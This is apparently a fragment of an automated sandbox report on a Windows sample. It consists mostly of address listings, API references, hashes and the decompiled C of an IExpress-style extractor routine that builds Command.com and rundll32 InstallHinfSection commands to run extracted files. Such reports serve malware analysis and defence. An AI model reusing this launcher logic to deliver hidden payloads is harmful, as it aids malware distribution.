                                                                                                                                                                                                                                    0x00403de8
                                                                                                                                                                                                                                    0x00403f0b
                                                                                                                                                                                                                                    0x00403f0b
                                                                                                                                                                                                                                    0x00403f0f
                                                                                                                                                                                                                                    0x00403f13
                                                                                                                                                                                                                                    0x00403f15
                                                                                                                                                                                                                                    0x00403f1a
                                                                                                                                                                                                                                    0x00403f1c
                                                                                                                                                                                                                                    0x00403f46
                                                                                                                                                                                                                                    0x00403f47
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403f47
                                                                                                                                                                                                                                    0x00403f1e
                                                                                                                                                                                                                                    0x00403f1f
                                                                                                                                                                                                                                    0x00403f25
                                                                                                                                                                                                                                    0x00403f26
                                                                                                                                                                                                                                    0x00403f2a
                                                                                                                                                                                                                                    0x00403f2d
                                                                                                                                                                                                                                    0x00403fd9
                                                                                                                                                                                                                                    0x00403fd9
                                                                                                                                                                                                                                    0x00403fda
                                                                                                                                                                                                                                    0x00403fda
                                                                                                                                                                                                                                    0x00403fe1
                                                                                                                                                                                                                                    0x00403fe3
                                                                                                                                                                                                                                    0x00403fe3
                                                                                                                                                                                                                                    0x00403fe8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403fe8
                                                                                                                                                                                                                                    0x00403f33
                                                                                                                                                                                                                                    0x00403f37
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403f37
                                                                                                                                                                                                                                    0x00403dee
                                                                                                                                                                                                                                    0x00403dee
                                                                                                                                                                                                                                    0x00403df5
                                                                                                                                                                                                                                    0x00403fad
                                                                                                                                                                                                                                    0x00403fb9
                                                                                                                                                                                                                                    0x00403fc2
                                                                                                                                                                                                                                    0x00403fc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403fc8
                                                                                                                                                                                                                                    0x00403dfb
                                                                                                                                                                                                                                    0x00403dfd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403e03
                                                                                                                                                                                                                                    0x00403e0a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403e15
                                                                                                                                                                                                                                    0x00403e17
                                                                                                                                                                                                                                    0x00403e19
                                                                                                                                                                                                                                    0x00403f94
                                                                                                                                                                                                                                    0x00403fa4
                                                                                                                                                                                                                                    0x00403f7c
                                                                                                                                                                                                                                    0x00403f80
                                                                                                                                                                                                                                    0x00403f8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403f8b
                                                                                                                                                                                                                                    0x00403e2c
                                                                                                                                                                                                                                    0x00403e30
                                                                                                                                                                                                                                    0x00403e34
                                                                                                                                                                                                                                    0x00403e36
                                                                                                                                                                                                                                    0x00403f69
                                                                                                                                                                                                                                    0x00403f6e
                                                                                                                                                                                                                                    0x00403f70
                                                                                                                                                                                                                                    0x00403f76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403f76
                                                                                                                                                                                                                                    0x00403e3c
                                                                                                                                                                                                                                    0x00403e43
                                                                                                                                                                                                                                    0x00403e47
                                                                                                                                                                                                                                    0x00403e52
                                                                                                                                                                                                                                    0x00403e56
                                                                                                                                                                                                                                    0x00403e5c
                                                                                                                                                                                                                                    0x00403e61
                                                                                                                                                                                                                                    0x00403e68
                                                                                                                                                                                                                                    0x00403e70
                                                                                                                                                                                                                                    0x00403e74
                                                                                                                                                                                                                                    0x00403e7c
                                                                                                                                                                                                                                    0x00403e80
                                                                                                                                                                                                                                    0x00403e82
                                                                                                                                                                                                                                    0x00403e82
                                                                                                                                                                                                                                    0x00403e87
                                                                                                                                                                                                                                    0x00403e87
                                                                                                                                                                                                                                    0x00403e8b
                                                                                                                                                                                                                                    0x00403e91
                                                                                                                                                                                                                                    0x00403e94
                                                                                                                                                                                                                                    0x00403e96
                                                                                                                                                                                                                                    0x00403e96
                                                                                                                                                                                                                                    0x00403e9b
                                                                                                                                                                                                                                    0x00403e9b
                                                                                                                                                                                                                                    0x00403e9f
                                                                                                                                                                                                                                    0x00403ea2
                                                                                                                                                                                                                                    0x00403ea4
                                                                                                                                                                                                                                    0x00403ea4
                                                                                                                                                                                                                                    0x00403ea9
                                                                                                                                                                                                                                    0x00403ea9
                                                                                                                                                                                                                                    0x00403ead
                                                                                                                                                                                                                                    0x00403eb3
                                                                                                                                                                                                                                    0x00403eb6
                                                                                                                                                                                                                                    0x00403eb8
                                                                                                                                                                                                                                    0x00403eb8
                                                                                                                                                                                                                                    0x00403ebd
                                                                                                                                                                                                                                    0x00403ebd
                                                                                                                                                                                                                                    0x00403ec1
                                                                                                                                                                                                                                    0x00403ec3
                                                                                                                                                                                                                                    0x00403ec5
                                                                                                                                                                                                                                    0x00403ec5
                                                                                                                                                                                                                                    0x00403eca
                                                                                                                                                                                                                                    0x00403eca
                                                                                                                                                                                                                                    0x00403ece
                                                                                                                                                                                                                                    0x00403ed5
                                                                                                                                                                                                                                    0x00403ed9
                                                                                                                                                                                                                                    0x00403ee0
                                                                                                                                                                                                                                    0x00403ee6
                                                                                                                                                                                                                                    0x00403eea
                                                                                                                                                                                                                                    0x00403eec
                                                                                                                                                                                                                                    0x00403eee
                                                                                                                                                                                                                                    0x00403ef3
                                                                                                                                                                                                                                    0x00403ef3
                                                                                                                                                                                                                                    0x00403ef5
                                                                                                                                                                                                                                    0x00403efa
                                                                                                                                                                                                                                    0x00403efb
                                                                                                                                                                                                                                    0x00403efd
                                                                                                                                                                                                                                    0x00403f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403eff
                                                                                                                                                                                                                                    0x00403eff
                                                                                                                                                                                                                                    0x00403f05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403f05
                                                                                                                                                                                                                                    0x00403efd
                                                                                                                                                                                                                                    0x00403dc7
                                                                                                                                                                                                                                    0x00403dce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403dd0
                                                                                                                                                                                                                                    0x00403dd7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403dd9
                                                                                                                                                                                                                                    0x00403ddb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403ddd
                                                                                                                                                                                                                                    0x00403de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403de1
                                                                                                                                                                                                                                    0x00403d59
                                                                                                                                                                                                                                    0x00403d65
                                                                                                                                                                                                                                    0x00403d6a
                                                                                                                                                                                                                                    0x00403d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403d6e
                                                                                                                                                                                                                                    0x00403d75
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403d8f
                                                                                                                                                                                                                                    0x00403d96
                                                                                                                                                                                                                                    0x00403d98
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403d98
                                                                                                                                                                                                                                    0x00403c8f
                                                                                                                                                                                                                                    0x00403c98
                                                                                                                                                                                                                                    0x00403cf1
                                                                                                                                                                                                                                    0x00403cf3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403cfe
                                                                                                                                                                                                                                    0x00403d11
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403d11
                                                                                                                                                                                                                                    0x00403c9c
                                                                                                                                                                                                                                    0x00403ca5
                                                                                                                                                                                                                                    0x00403ca7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403cad
                                                                                                                                                                                                                                    0x00403cb2
                                                                                                                                                                                                                                    0x00403cb7
                                                                                                                                                                                                                                    0x00403cc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403ce8
                                                                                                                                                                                                                                    0x00403cec
                                                                                                                                                                                                                                    0x00403ced
                                                                                                                                                                                                                                    0x00403ced
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403ce8
                                                                                                                                                                                                                                    0x00403c9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403c9e
                                                                                                                                                                                                                                    0x00403c56
                                                                                                                                                                                                                                    0x00403d35
                                                                                                                                                                                                                                    0x00403d35
                                                                                                                                                                                                                                    0x00403d3c
                                                                                                                                                                                                                                    0x00403d48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403d48
                                                                                                                                                                                                                                    0x00403c03
                                                                                                                                                                                                                                    0x00403be2
                                                                                                                                                                                                                                    0x00403be7
                                                                                                                                                                                                                                    0x00403bee
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403C11
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00403CDC
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00408C42), ref: 00403D8F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00403E26
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403EFF
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F1F
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403F40
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F47
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00408C42), ref: 00403F76
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403F80
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403FC2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
                                                                                                                                                                                                                                    • API String ID: 1032054927-2941528158
                                                                                                                                                                                                                                    • Opcode ID: 0a34870bfc71a7d66ef00e24bd5cf700ac72abaeedef1083e1b531c7b89e28e4
                                                                                                                                                                                                                                    • Instruction ID: 4eb6e881215b4124141a09aa4552a99e739b7383a09d60a45f4522afb61a9575
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a34870bfc71a7d66ef00e24bd5cf700ac72abaeedef1083e1b531c7b89e28e4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0B1B4706083019BE720DF248945B6B7AE8AB84715F10493FFA85F62E1D77C8D45CB5E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 141 401ae8-401b2c call 401680 144 401b3b-401b40 141->144 145 401b2e-401b39 141->145 146 401b46-401b61 call 401a84 144->146 145->146 149 401b63-401b65 146->149 150 401b9f-401bc2 call 401781 call 40658a 146->150 152 401b68-401b6d 149->152 157 401bc7-401bd3 call 4066c8 150->157 152->152 154 401b6f-401b74 152->154 154->150 156 401b76-401b7b 154->156 158 401b83-401b86 156->158 159 401b7d-401b81 156->159 166 401d73-401d7f call 4066c8 157->166 167 401bd9-401bf1 CompareStringA 157->167 158->150 162 401b88-401b8a 158->162 159->158 161 401b8c-401b9d call 401680 159->161 161->157 162->150 162->161 175 401d81-401d99 CompareStringA 166->175 176 401df8-401e09 LocalAlloc 166->176 167->166 168 401bf7-401c07 GetFileAttributesA 167->168 170 401d53-401d5e 168->170 171 401c0d-401c15 168->171 173 401d64-401d6e call 4044b9 170->173 171->170 174 401c1b-401c33 call 401a84 171->174 191 401e94-401ea4 call 406ce0 173->191 187 401c50-401c61 LocalAlloc 174->187 188 401c35-401c38 174->188 175->176 181 401d9b-401da2 175->181 178 401dd4-401ddf 176->178 179 401e0b-401e1b GetFileAttributesA 176->179 178->173 184 401e67-401e73 call 401680 179->184 185 401e1d-401e1f 179->185 182 401da5-401daa 181->182 182->182 189 401dac-401db4 182->189 197 401e78-401e84 call 402aac 184->197 185->184 192 401e21-401e3e call 401781 185->192 187->178 196 401c67-401c72 187->196 193 401c40-401c4b call 401a84 188->193 194 401c3a 188->194 195 401db7-401dbc 189->195 192->197 211 401e40-401e43 192->211 193->187 194->193 195->195 201 401dbe-401dd2 LocalAlloc 195->201 202 401c74 196->202 203 401c79-401cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->203 210 401e89-401e92 197->210 201->178 207 401de1-401df3 call 40171e 201->207 202->203 208 401cc2-401ccc 203->208 209 401cf8-401d07 203->209 207->210 215 401cd3-401cf3 call 401680 * 2 208->215 216 401cce 208->216 212 401d23 209->212 213 401d09-401d21 GetShortPathNameA 209->213 210->191 211->197 217 401e45-401e65 call 4016b3 * 2 211->217 219 401d28-401d2b 212->219 213->219 215->210 216->215 217->197 223 401d32-401d4e call 40171e 219->223 224 401d2d 219->224 223->210 224->223
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00401AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x408004; // 0x8f135e3b
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00401680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00401A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00401781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					E0040658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00401680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E004066C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E004066C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00401680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00401781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E004016B3( &_v1552, 0x400, " ");
										E004016B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00402AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0040171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00401A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00401A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E004044B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x409120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x401140, _t156, 8,  &_v268) == 0) {
										 *0x409a34 =  *0x409a34 & 0xfffffffb;
										if( *0x409a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0040171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x409a34 =  *0x409a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00401680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00401680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00406CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                                                    0x00401af3
                                                                                                                                                                                                                                    0x00401afa
                                                                                                                                                                                                                                    0x00401b07
                                                                                                                                                                                                                                    0x00401b09
                                                                                                                                                                                                                                    0x00401b1a
                                                                                                                                                                                                                                    0x00401b20
                                                                                                                                                                                                                                    0x00401b2c
                                                                                                                                                                                                                                    0x00401b3b
                                                                                                                                                                                                                                    0x00401b40
                                                                                                                                                                                                                                    0x00401b2e
                                                                                                                                                                                                                                    0x00401b2e
                                                                                                                                                                                                                                    0x00401b33
                                                                                                                                                                                                                                    0x00401b33
                                                                                                                                                                                                                                    0x00401b46
                                                                                                                                                                                                                                    0x00401b4c
                                                                                                                                                                                                                                    0x00401b52
                                                                                                                                                                                                                                    0x00401b57
                                                                                                                                                                                                                                    0x00401b5d
                                                                                                                                                                                                                                    0x00401b61
                                                                                                                                                                                                                                    0x00401b9f
                                                                                                                                                                                                                                    0x00401b9f
                                                                                                                                                                                                                                    0x00401bb1
                                                                                                                                                                                                                                    0x00401bc2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401b63
                                                                                                                                                                                                                                    0x00401b63
                                                                                                                                                                                                                                    0x00401b65
                                                                                                                                                                                                                                    0x00401b68
                                                                                                                                                                                                                                    0x00401b68
                                                                                                                                                                                                                                    0x00401b6a
                                                                                                                                                                                                                                    0x00401b6b
                                                                                                                                                                                                                                    0x00401b6f
                                                                                                                                                                                                                                    0x00401b74
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401b76
                                                                                                                                                                                                                                    0x00401b7b
                                                                                                                                                                                                                                    0x00401b86
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401b8c
                                                                                                                                                                                                                                    0x00401b8c
                                                                                                                                                                                                                                    0x00401b98
                                                                                                                                                                                                                                    0x00401bc7
                                                                                                                                                                                                                                    0x00401bc9
                                                                                                                                                                                                                                    0x00401bcc
                                                                                                                                                                                                                                    0x00401bd3
                                                                                                                                                                                                                                    0x00401d75
                                                                                                                                                                                                                                    0x00401d76
                                                                                                                                                                                                                                    0x00401d78
                                                                                                                                                                                                                                    0x00401d7f
                                                                                                                                                                                                                                    0x00401e05
                                                                                                                                                                                                                                    0x00401e09
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401e12
                                                                                                                                                                                                                                    0x00401e1b
                                                                                                                                                                                                                                    0x00401e73
                                                                                                                                                                                                                                    0x00401e21
                                                                                                                                                                                                                                    0x00401e21
                                                                                                                                                                                                                                    0x00401e28
                                                                                                                                                                                                                                    0x00401e37
                                                                                                                                                                                                                                    0x00401e3e
                                                                                                                                                                                                                                    0x00401e52
                                                                                                                                                                                                                                    0x00401e60
                                                                                                                                                                                                                                    0x00401e60
                                                                                                                                                                                                                                    0x00401e3e
                                                                                                                                                                                                                                    0x00401e79
                                                                                                                                                                                                                                    0x00401e7b
                                                                                                                                                                                                                                    0x00401e84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d9b
                                                                                                                                                                                                                                    0x00401d9b
                                                                                                                                                                                                                                    0x00401da0
                                                                                                                                                                                                                                    0x00401da2
                                                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                                                    0x00401da7
                                                                                                                                                                                                                                    0x00401da8
                                                                                                                                                                                                                                    0x00401dac
                                                                                                                                                                                                                                    0x00401dae
                                                                                                                                                                                                                                    0x00401db4
                                                                                                                                                                                                                                    0x00401db7
                                                                                                                                                                                                                                    0x00401db7
                                                                                                                                                                                                                                    0x00401db9
                                                                                                                                                                                                                                    0x00401dba
                                                                                                                                                                                                                                    0x00401dbe
                                                                                                                                                                                                                                    0x00401dc3
                                                                                                                                                                                                                                    0x00401dce
                                                                                                                                                                                                                                    0x00401dd2
                                                                                                                                                                                                                                    0x00401deb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401dd2
                                                                                                                                                                                                                                    0x00401bf7
                                                                                                                                                                                                                                    0x00401bfe
                                                                                                                                                                                                                                    0x00401c07
                                                                                                                                                                                                                                    0x00401d55
                                                                                                                                                                                                                                    0x00401d5a
                                                                                                                                                                                                                                    0x00401d5b
                                                                                                                                                                                                                                    0x00401d5d
                                                                                                                                                                                                                                    0x00401d5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c1b
                                                                                                                                                                                                                                    0x00401c1b
                                                                                                                                                                                                                                    0x00401c20
                                                                                                                                                                                                                                    0x00401c2c
                                                                                                                                                                                                                                    0x00401c33
                                                                                                                                                                                                                                    0x00401c38
                                                                                                                                                                                                                                    0x00401c3a
                                                                                                                                                                                                                                    0x00401c3a
                                                                                                                                                                                                                                    0x00401c40
                                                                                                                                                                                                                                    0x00401c4b
                                                                                                                                                                                                                                    0x00401c4b
                                                                                                                                                                                                                                    0x00401c5d
                                                                                                                                                                                                                                    0x00401c61
                                                                                                                                                                                                                                    0x00401dd4
                                                                                                                                                                                                                                    0x00401dd4
                                                                                                                                                                                                                                    0x00401dd6
                                                                                                                                                                                                                                    0x00401ddb
                                                                                                                                                                                                                                    0x00401ddc
                                                                                                                                                                                                                                    0x00401dde
                                                                                                                                                                                                                                    0x00401d64
                                                                                                                                                                                                                                    0x00401d64
                                                                                                                                                                                                                                    0x00401d67
                                                                                                                                                                                                                                    0x00401d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c67
                                                                                                                                                                                                                                    0x00401c67
                                                                                                                                                                                                                                    0x00401c6d
                                                                                                                                                                                                                                    0x00401c72
                                                                                                                                                                                                                                    0x00401c74
                                                                                                                                                                                                                                    0x00401c74
                                                                                                                                                                                                                                    0x00401c8e
                                                                                                                                                                                                                                    0x00401c99
                                                                                                                                                                                                                                    0x00401cc0
                                                                                                                                                                                                                                    0x00401cf8
                                                                                                                                                                                                                                    0x00401d07
                                                                                                                                                                                                                                    0x00401d23
                                                                                                                                                                                                                                    0x00401d09
                                                                                                                                                                                                                                    0x00401d14
                                                                                                                                                                                                                                    0x00401d1b
                                                                                                                                                                                                                                    0x00401d1b
                                                                                                                                                                                                                                    0x00401d2b
                                                                                                                                                                                                                                    0x00401d2d
                                                                                                                                                                                                                                    0x00401d2d
                                                                                                                                                                                                                                    0x00401d38
                                                                                                                                                                                                                                    0x00401d39
                                                                                                                                                                                                                                    0x00401d46
                                                                                                                                                                                                                                    0x00401cc2
                                                                                                                                                                                                                                    0x00401cc2
                                                                                                                                                                                                                                    0x00401ccc
                                                                                                                                                                                                                                    0x00401cce
                                                                                                                                                                                                                                    0x00401cce
                                                                                                                                                                                                                                    0x00401cdb
                                                                                                                                                                                                                                    0x00401ce6
                                                                                                                                                                                                                                    0x00401cee
                                                                                                                                                                                                                                    0x00401cee
                                                                                                                                                                                                                                    0x00401e89
                                                                                                                                                                                                                                    0x00401e91
                                                                                                                                                                                                                                    0x00401e92
                                                                                                                                                                                                                                    0x00401e94
                                                                                                                                                                                                                                    0x00401e97
                                                                                                                                                                                                                                    0x00401ea4
                                                                                                                                                                                                                                    0x00401ea4
                                                                                                                                                                                                                                    0x00401c61
                                                                                                                                                                                                                                    0x00401c07
                                                                                                                                                                                                                                    0x00401bd3
                                                                                                                                                                                                                                    0x00401b7b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401BE7
